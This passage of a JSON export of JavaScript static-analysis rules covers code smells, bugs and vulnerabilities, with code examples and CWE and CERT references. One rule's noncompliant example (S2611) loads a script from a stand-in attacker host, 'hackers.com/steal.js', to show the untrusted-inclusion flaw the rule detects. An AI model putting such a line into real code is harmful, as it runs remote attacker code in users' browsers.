}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"maximumNestingLevel","htmlDesc":"Maximum allowed "if\/for\/while\/switch\/try" statements nesting depth","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:ParsingError","repo":"javascript","name":"JavaScript parser failure","htmlDesc":"<p>When the JavaScript parser fails, it is possible to record the failure as a violation on the file. This way, not only it is possible to track the\nnumber of files that do not parse but also to easily find out why they do not parse.<\/p>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:PrimitiveWrappers","repo":"javascript","name":"Wrapper objects should not be used for primitive types","htmlDesc":"<p>The use of wrapper objects for primitive types is gratuitous, confusing and dangerous. If you use a wrapper object constructor for type conversion,\njust remove the <code>new<\/code> keyword, and you'll get a primitive value automatically. If you use a wrapper object as a way to add properties to a\nprimitive, you should re-think the design. Such uses are considered bad practice, and should be refactored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nlet x = new Number(\"0\");\nif (x) {\n alert('hi'); \/\/ Shows 'hi'.\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nlet x = Number(\"0\");\nif (x) {\n alert('hi');\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Cases when argument of primitive type constructor is a literal of the same type are ignored, except <code>new Boolean(false)<\/code>.<\/p>\n<pre>\nlet booleanObject = new Boolean(true);\nlet numberObject = new Number(0);\nlet stringObject = new String('');\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1067","repo":"javascript","name":"Expressions should not be too complex","htmlDesc":"<p>The complexity of an expression is defined by the number of <code>&&<\/code>, <code>||<\/code> and <code>condition ? ifTrue : ifFalse<\/code>\noperators it contains.<\/p>\n<p>A single expression's complexity should not become too high to keep the code readable.<\/p>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"max","htmlDesc":"Maximum number of allowed conditional operators in an expression","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S1105","repo":"javascript","name":"An open curly brace should be located at the end of a line","htmlDesc":"<p>Sharing some coding conventions is a key point to make it possible for a team to efficiently collaborate. This rule makes it mandatory to place\nopen curly braces at the end of lines of code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition)\n{ \/\/Noncompliant\n doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition) { \/\/Compliant\n doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Object literals appearing as arguments can start on their own line.<\/p>\n<pre>\nfunctionWithObject(\n { \/\/Compliant\n g: \"someValue\"\n }\n);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1125","repo":"javascript","name":"Boolean literals should not be redundant","htmlDesc":"<p>Redundant Boolean literals should be removed from expressions to improve readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (booleanVariable == true) { \/* ... *\/ }\nif (booleanVariable != true) { \/* ... *\/ }\nif (booleanVariable || false) { \/* ... *\/ }\ndoSomething(!false);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (booleanVariable) { \/* ... *\/ }\nif (!booleanVariable) { \/* ... *\/ }\nif (booleanVariable) { \/* ... *\/ }\ndoSomething(true);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The use of literal booleans in comparisons which use identity operators (<code>===<\/code> and <code>!==<\/code>) are ignored.<\/p>\n\n<h2>Deprecated<\/h2>\n<p>This rule is deprecated, and will eventually be removed.<\/p>","status":"DEPRECATED","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1134","repo":"javascript","name":"Track uses of \"FIXME\" tags","htmlDesc":"<p><code>FIXME<\/code> tags are commonly used to mark places where a bug is suspected, but which the developer wants to deal with later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide(numerator, denominator) {\n return numerator \/ denominator; \/\/ FIXME denominator value might be 0\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1135","repo":"javascript","name":"Track uses of \"TODO\" tags","htmlDesc":"<p><code>TODO<\/code> tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n \/\/ TODO\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1219","repo":"javascript","name":"\"switch\" statements should not contain non-case labels","htmlDesc":"<p>Even if it is legal, mixing case and non-case labels in the body of a switch statement is very confusing and can even be the result of a typing\nerror.<\/p>\n<h2>Noncompliant Code Examples<\/h2>\n<p>Case 1, the code is syntactically correct but the behavior is not the expected one<\/p>\n<pre>\nswitch (day) {\n case MONDAY:\n case TUESDAY:\n WEDNESDAY: \/\/ instead of \"case WEDNESDAY\"\n doSomething();\n break;\n ...\n}\n<\/pre>\n<p>Case 2, the code is correct and behaves as expected but is hardly readable <\/p>\n<pre>\nswitch (day) {\n case MONDAY:\n break;\n case TUESDAY:\n foo:for(i = 0 ; i < X ; i++) {\n \/* ... *\/\n break foo; \/\/ this break statement doesn't relate to the nesting case TUESDAY\n \/* ... *\/\n }\n break;\n \/* ... *\/\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<p>Case 1<\/p>\n<pre>\nswitch (day) {\n case MONDAY:\n case TUESDAY:\n case WEDNESDAY:\n doSomething();\n break;\n ...\n}\n<\/pre>\n<p>Case 2<\/p>\n<pre>\nswitch (day) {\n case MONDAY:\n break;\n case TUESDAY:\n compute(args); \/\/ put the content of the labelled \"for\" statement in a dedicated method\n break;\n\n \/* ... *\/\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1264","repo":"javascript","name":"A \"while\" loop should be used instead of a \"for\" loop","htmlDesc":"<p>When only the condition expression is defined in a <code>for<\/code> loop, and the initialization and increment expressions are missing, a\n<code>while<\/code> loop should be used instead to increase readability. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (;condition;) { \/*...*\/ }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nwhile (condition) { \/*...*\/ }\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1301","repo":"javascript","name":"\"switch\" statements should have at least 3 \"case\" clauses","htmlDesc":"<p><code>switch<\/code> statements are useful when there are many different cases depending on the value of the same expression.<\/p>\n<p>For just one or two cases however, the code will be more readable with <code>if<\/code> statements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (variable) {\n case 0:\n doSomething();\n break;\n default:\n doSomethingElse();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (variable == 0) {\n doSomething();\n} else {\n doSomethingElse();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.5 - Every switch statement shall have at least one case clause. <\/li>\n <li> MISRA C++:2008, 6-4-8 - Every switch statement shall have at least one case-clause. <\/li>\n <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S138","repo":"javascript","name":"Functions should not have too many lines","htmlDesc":"<p>A function that grows too large tends to aggregate too many responsibilities.<\/p>\n<p>Such functions inevitably become harder to understand and therefore harder to maintain. <\/p>\n<p>Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.<\/p>\n<p>Those smaller functions will not only be easier to understand, but also probably easier to test.<\/p>\n<h2>Exceptions<\/h2>\n<p>This function ignores Immediately Invoked Function Expressions (IIFE), which are functions that are created and invoked without ever being assigned\na name.<\/p>\n<pre>\n(function () { \/\/ Ignored by this rule\n\n function open() { \/\/ Classic function declaration; not ignored\n \/\/ ...\n }\n\n function read() {\n \/\/ ...\n }\n\n function readlines() {\n \/\/ ...\n }\n})();\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"max","htmlDesc":"Maximum authorized lines in a function","defaultValue":"200","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S1442","repo":"javascript","name":"\"alert(...)\" should not be used","htmlDesc":"<p><code>alert(...)<\/code> can be useful for debugging during development, but in production mode this kind of pop-up could expose sensitive\ninformation to attackers, and should never be displayed. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(unexpectedCondition)\n{\n alert(\"Unexpected Condition\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489.html\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S1656","repo":"javascript","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction setName(name) {\n name = name;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction setName(name) {\n this.name = name;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S1871","repo":"javascript","name":"Two branches in a conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having two <code>cases<\/code> in a <code>switch<\/code> statement or two branches in an <code>if<\/code> chain with the same implementation is at\nbest duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an <code>if<\/code> chain they should\nbe combined, or for a <code>switch<\/code>, one should fall through to the other. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (i) {\n case 1:\n doFirstThing();\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n case 3: \/\/ Noncompliant; duplicates case 1's implementation\n doFirstThing();\n doSomething();\n break;\n default:\n doTheRest();\n}\n\nif (a >= 0 && a < 10) {\n doFirstThing();\n doTheThing();\n}\nelse if (a >= 10 && a < 20) {\n doTheOtherThing();\n}\nelse if (a >= 20 && a < 50) {\n doFirstThing();\n doTheThing(); \/\/ Noncompliant; duplicates first condition\n}\nelse {\n doTheRest();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (i) {\n case 1:\n case 3:\n doFirstThing();\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n default:\n doTheRest();\n}\n\nif ((a >= 0 && a < 10) || (a >= 20 && a < 50)) {\n doFirstThing();\n doTheThing();\n}\nelse if (a >= 10 && a < 20) {\n doTheOtherThing();\n}\nelse {\n doTheRest();\n}\n<\/pre>\n<p>or <\/p>\n<pre>\nswitch (i) {\n case 1:\n doFirstThing();\n doSomething();\n break;\n case 2:\n doSomethingDifferent();\n break;\n case 3:\n doFirstThing();\n doThirdThing();\n break;\n default:\n doTheRest();\n}\n\nif (a >= 0 && a < 10) {\n doFirstThing();\n doTheThing();\n}\nelse if (a >= 10 && a < 20) {\n doTheOtherThing();\n}\nelse if (a >= 20 && a < 50) {\n doFirstThing();\n doTheThirdThing();\n}\nelse {\n doTheRest();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Blocks in an <code>if<\/code> chain that contain a single line of code are ignored, as are blocks in a <code>switch<\/code> statement that contain a\nsingle line of code with or without a following <code>break<\/code>.<\/p>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1994","repo":"javascript","name":"\"for\" loop increment clauses should modify the loops' counters","htmlDesc":"<p>It can be extremely confusing when a <code>for<\/code> loop's counter is incremented outside of its increment clause. In such cases, the increment\nshould be moved to the loop's increment clause if at all possible.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (i = 0; i < 10; j++) { \/\/ Noncompliant\n \/\/ ...\n i++;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (i = 0; i < 10; i++, j++) {\n \/\/ ...\n}\n<\/pre>\n<p>Or<\/p>\n<pre>\nfor (i = 0; i < 10; i++) {\n \/\/ ...\n j++;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2123","repo":"javascript","name":"Values should not be uselessly incremented","htmlDesc":"<p>A value that is incremented or decremented and then not stored is at best wasted code and at worst a bug.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar i = 0;\ni = i++; \/\/ Noncompliant; i is still zero\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar i = 0;\ni++;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2138","repo":"javascript","name":"\"undefined\" should not be assigned","htmlDesc":"<p><code>undefined<\/code> is the value you get for variables and properties which have not yet been created. Use the same value to reset an existing\nvariable and you lose the ability to distinguish between a variable that exists but has no value and a variable that does not yet exist. Instead,\n<code>null<\/code> should be used, allowing you to tell the difference between a property that has been reset and one that was never created.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myObject = {};\n\n\/\/ ...\nmyObject.fname = undefined; \/\/ Noncompliant\n\/\/ ...\n\nif (myObject.lname == undefined) {\n \/\/ property not yet created\n}\nif (myObject.fname == undefined) {\n \/\/ no real way of knowing the true state of myObject.fname\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar myObject = {};\n\n\/\/ ...\nmyObject.fname = null;\n\/\/ ...\n\nif (myObject.lname == undefined) {\n \/\/ property not yet created\n}\nif (myObject.fname == undefined) {\n \/\/ no real way of knowing the true state of myObject.fname\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2208","repo":"javascript","name":"Wildcard imports should not be used","htmlDesc":"<p>On the principle that clearer code is better code, you should explicitly <code>import<\/code> the things you want to use in a module. Using\n<code>import *<\/code> imports everything in the module, and runs the risk of confusing maintainers. Similarly, <code>export * from \"module\";<\/code>\nimports and then re-exports everything in the module, and runs the risk of confusing not just maintainers but also users of the module.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nimport * as Imported from \"aModule\"; \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2228","repo":"javascript","name":"Console logging should not be used","htmlDesc":"<p>Debug statements are always useful during development. But include them in production code - particularly in code that runs client-side - and you\nrun the risk of inadvertently exposing sensitive information, slowing down the browser, or even erroring-out the site for some users.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconsole.log(password_entered); \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2234","repo":"javascript","name":"Parameters should be passed in the correct order","htmlDesc":"<p>When the names of arguments in a function call match the names of the function parameters, it contributes to clearer, more readable code. However,\nwhen the names match, but are passed in a different order than the function parameters, it indicates a mistake in the parameter order which will\nlikely lead to unexpected results.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide(divisor, dividend) {\n return divisor\/dividend;\n}\n\nfunction doTheThing() {\n var divisor = 15;\n var dividend = 5;\n\n var result = divide(dividend, divisor); \/\/ Noncompliant; operation succeeds, but result is unexpected\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction divide(divisor, dividend) {\n return divisor\/dividend;\n}\n\nfunction doTheThing() {\n var divisor = 15;\n var dividend = 5;\n\n var result = divide(divisor, dividend);\n \/\/...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2251","repo":"javascript","name":"A \"for\" loop update clause should move the counter in the right direction","htmlDesc":"<p>A <code>for<\/code> loop with a stop condition that can never be reached, such as one with a counter that moves in the wrong direction, will run\ninfinitely. While there are occasions when an infinite loop is intended, the convention is to construct such loops as <code>while<\/code> loops. More\ntypically, an infinite <code>for<\/code> loop is a bug. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 0; i < strings.length; i--) { \/\/ Noncompliant;\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 0; i < strings.length; i++) {\n \/\/...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/zYEzAg\">CERT, MSC54-J.<\/a> - Avoid inadvertent wrapping of loop counters <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2392","repo":"javascript","name":"Variables should be defined in the blocks where they are used","htmlDesc":"<p>A variable that is declared at function scope, but only used inside a single block should be declared in that block, and variables that are\ndeclared inside a block but used outside of it (which is possible with a <code>var<\/code>-style declaration) should be declared outside the block.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething(a, b) {\n var i; \/\/ Noncompliant; should be declared in if-block\n if (a > b) {\n i = a;\n console.log(i);\n var x = a - b; \/\/ Noncompliant; should be declared outside if-block\n }\n\n if (a > 4) {\n console.log(x);\n }\n\n return a+b;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(a, b) {\n var x = a - b;\n\n if (a > b) {\n var i = a;\n console.log(i);\n }\n\n if (a > 4) {\n console.log(x);\n }\n\n return a+b;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2424","repo":"javascript","name":"Built-in objects should not be overridden","htmlDesc":"<p>Overriding an object changes its behavior and could potentially impact all code using that object. Overriding standard, built-in objects could\ntherefore have broad, potentially catastrophic effects on previously-working code.<\/p>\n<p>This rule detects overrides of the following native objects:<\/p>\n<ul>\n <li> Fundamental objects - Object, Function, Boolean, Symbol, Error, EvalError, InternalError, RangeError, ReferenceError, SyntaxError, TypeError,\n URIError <\/li>\n <li> Numbers and dates - Number, Math, Date <\/li>\n <li> Text processing - String, RegExp <\/li>\n <li> Indexed collections - Array, Int8Array, Uint8Array, Uint8ClampedArray, Int16Array, Unit16Array, Int32Array, Uint32Array, Float32Array,\n Float64Array <\/li>\n <li> Keyed collections - Map, Set, WeakMap, WeakSet <\/li>\n <li> Structured data - ArrayBuffer, DataView, JSON <\/li>\n <li> Control abstraction objects - Promise <\/li>\n <li> Reflection - Reflect, Proxy <\/li>\n <li> Internationalization - Intl <\/li>\n <li> Non-standard objects - Generator, Iterator, ParallelArray, StopIteration <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2427","repo":"javascript","name":"The base should be provided to \"parseInt\"","htmlDesc":"<p>The <code>parseInt<\/code> function has two versions, one that takes a base value as a second argument, and one that does not. Unfortunately using\nthe single-arg version can result in unexpected results on older browsers. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nparseInt(\"010\"); \/\/ Noncompliant; pre-2013 browsers may return 8\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nparseInt(\"010\", 10);\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2432","repo":"javascript","name":"Setters should not return values","htmlDesc":"<p>Functions declared with the <code>set<\/code> keyword will automatically return the values they were passed. Thus any value explicitly returned from\na setter will be ignored, and explicitly returning a value is an error.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar person = {\n \/\/ ...\n set name(name) {\n this.name = name;\n return 42; \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar person = {\n \/\/ ...\n set name(name) {\n this.name = name;\n }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2508","repo":"javascript","name":"The names of model properties should not contain spaces","htmlDesc":"<p>When using the Backbone.js framework, the names of model attributes should not contain spaces. This is because the Events object accepts\nspace-delimited lists of events, so an attributes with spaces in the names could be misinterpreted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nPerson = Backbone.Model.extend({\n defaults: {\n 'first name': 'Bob', \/\/ Noncompliant\n 'birth date': new Date() \/\/ Noncompliant\n },\n });\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nPerson = Backbone.Model.extend({\n defaults: {\n firstName: 'Bob',\n birthDate: new Date()\n },\n });\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2583","repo":"javascript","name":"Conditionally executed blocks should be reachable","htmlDesc":"<p>Conditional expressions which are always <code>true<\/code> or <code>false<\/code> can lead to dead code. Such code is always buggy and should never\nbe used in production.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = false;\nif (a) { \/\/ Noncompliant\n doSomething(); \/\/ never executed\n}\n\nif (!a || b) { \/\/ Noncompliant; \"!a\" is always \"true\", \"b\" is never evaluated\n doSomething();\n} else {\n doSomethingElse(); \/\/ never executed\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2589","repo":"javascript","name":"Boolean expressions should not be gratuitous","htmlDesc":"<p>If a boolean expression doesn't change the evaluation of the condition, then it is entirely unnecessary, and can be removed. If it is gratuitous\nbecause it does not match the programmer's intent, then it's a bug and the expression should be fixed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = true;\nif (a) { \/\/ Noncompliant\n doSomething();\n}\n\nif (b && a) { \/\/ Noncompliant; \"a\" is always \"true\"\n doSomething();\n}\n\nif (c || !a) { \/\/ Noncompliant; \"!a\" is always \"false\"\n doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\na = true;\nif (foo(a)) {\n doSomething();\n}\n\nif (b) {\n doSomething();\n}\n\nif (c) {\n doSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2611","repo":"javascript","name":"Untrusted content should not be included","htmlDesc":"<p>Including content in your site from an untrusted source can expose your users to attackers and even compromise your own site. For that reason, this\nrule raises an issue for each non-relative URL.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction include(url) {\n var s = document.createElement(\"script\");\n s.setAttribute(\"type\", \"text\/javascript\");\n s.setAttribute(\"src\", url);\n document.body.appendChild(s);\n}\ninclude(\"http:\/\/hackers.com\/steal.js\") \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/829\">MITRE, CWE-829<\/a> - Inclusion of Functionality from Untrusted Control Sphere <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Risky Resource Management <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"domainsToIgnore","htmlDesc":"Comma-delimited list of domains to ignore. Regexes may be used, e.g. (.*\\.)?example.com,foo.org","type":"STRING"}],"type":"VULNERABILITY"},{"key":"javascript:S2688","repo":"javascript","name":"\"NaN\" should not be used in comparisons","htmlDesc":"<p><code>NaN<\/code> is not equal to anything, even itself. Testing for equality or inequality against <code>NaN<\/code> will yield predictable results,\nbut probably not the ones you want. <\/p>\n<p>Instead, the best way to see whether a variable is equal to <code>NaN<\/code> is to use <code>Number.isNaN()<\/code>, since ES2015, or (perhaps\ncounter-intuitively) to compare it to itself. Since <code>NaN !== NaN<\/code>, when <code>a !== a<\/code>, you know it must equal <code>NaN<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar a = NaN;\n\nif (a === NaN) { \/\/ Noncompliant; always false\n console.log(\"a is not a number\"); \/\/ this is dead code\n}\nif (a !== NaN) { \/\/ Noncompliant; always true\n console.log(\"a is not NaN\"); \/\/ this statement is not necessarily true\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (Number.isNaN(a)) {\n console.log(\"a is not a number\");\n}\nif (!Number.isNaN(a)) {\n console.log(\"a is not NaN\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7AEqAQ\">CERT, NUM07-J.<\/a> - Do not attempt comparisons with NaN <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2692","repo":"javascript","name":"\"indexOf\" checks should not be for positive numbers","htmlDesc":"<p>Most checks against an <code>indexOf<\/code> call against a string or array compare it with -1 because 0 is a valid index. Any checks which look for\nvalues >0 ignore the first element, which is likely a bug.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar color = \"blue\";\nvar name = \"ishmael\";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf(\"blue\") > 0) { \/\/ Noncompliant\n \/\/ ...\n}\nif (arr[0].indexOf(\"ish\") > 0 { \/\/ Noncompliant\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar color = \"blue\";\nvar name = \"ishmael\";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf(\"blue\") >= 0) {\n \/\/ ...\n}\nif (arr[0].indexOf(\"ish\") > -1) {\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2714","repo":"javascript","name":"Element type selectors should not be used with class selectors","htmlDesc":"<p>Using element type in class selectors is slower than using only the class selector.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar $products = $(\"div.products\"); \/\/ Noncompliant - slow\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar $products = $(\".products\"); \/\/ 